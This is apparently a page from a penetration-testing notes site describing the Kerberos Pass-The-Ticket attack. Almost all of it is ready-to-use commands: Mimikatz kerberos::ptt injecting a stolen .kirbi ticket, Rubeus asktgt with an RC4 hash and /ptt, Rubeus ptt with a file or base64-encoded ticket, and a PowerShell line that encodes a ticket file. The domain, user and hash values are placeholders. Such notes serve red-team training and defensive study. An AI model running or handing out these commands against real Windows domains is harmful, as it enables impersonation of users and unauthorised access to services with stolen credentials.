Pass The Ticket

About

Pass-The-Ticket in contrast of Pass-The-Hash and Overpass-The-Hash use a ticket to gain access to the TGS and then for service.

Mimikatz

kerberos::ptt "C:\Users\v17\Desktop\Mimikatz\[0;7f830]-5-2-43f10000-v17@krbtgt-amogus.kek.kirbi"

Rubeus

Using Hash

Rubeus.exe asktgt /domain:amogus.kek /user:v17 /rc4:1293uo1uwfoi1hw081 /ptt

Unlike command for Overpass-The-Hash, here we are using /ptt to do both Overpass-The-Hash and Pass-The-Ticket simultaneously. But that only works if we give /hash: instead of ticket

Using Ticket

Rubeus.exe ptt /ticket:[0;7f830]-5-2-43f10000-v17@krbtgt-amogus.kek.kirbi

Using Encoded Ticket

[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;7f830]-5-2-43f10000-v17@krbtgt-amogus.kek.kirbi"))

Rubeus.exe ptt /ticket:LETSIMAGINETHISISOURBASE64ENCODEDKERBEROSTICKET

PreviousOverpass The Hash NextnoPAC